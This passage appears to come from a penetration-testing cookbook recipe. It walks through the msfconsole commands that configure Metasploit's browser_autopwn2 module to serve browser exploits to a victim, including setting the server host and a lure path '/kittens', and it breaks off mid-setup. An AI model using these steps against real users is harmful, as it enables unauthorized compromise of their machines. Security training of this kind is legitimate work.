Using Metasploit's browser_autpwn2 to attack a client
Metasploit Framework includes a huge collection of client-side exploits, many of them are meant to exploit known vulnerabilities in web browsers and there is a module that has the ability to detect the version of browser the client is using and picks the best exploit to trigger, this module is browser_autopwn or browser_autopwn2, in its newest version.
In this recipe, we will set up an attack with browser_autopwn2 and get it ready for a victim to come in.
How to do it...
Start msfconsole.
We will use version 2 of Browser Autopwn (BAP2):
use auxiliary/server/browser_autopwn2Let's take a look at what configurable options it has:
show options
We will set our Kali server to receive connections:
set SRVHOST 192.168.56.1Then, we will create a path
/kittensfor the server to respond to:set URIPATH /kittensThis module triggers a multitude of exploits, including some for Android; suppose we are setting up an attack with PCs as targets and don't want...
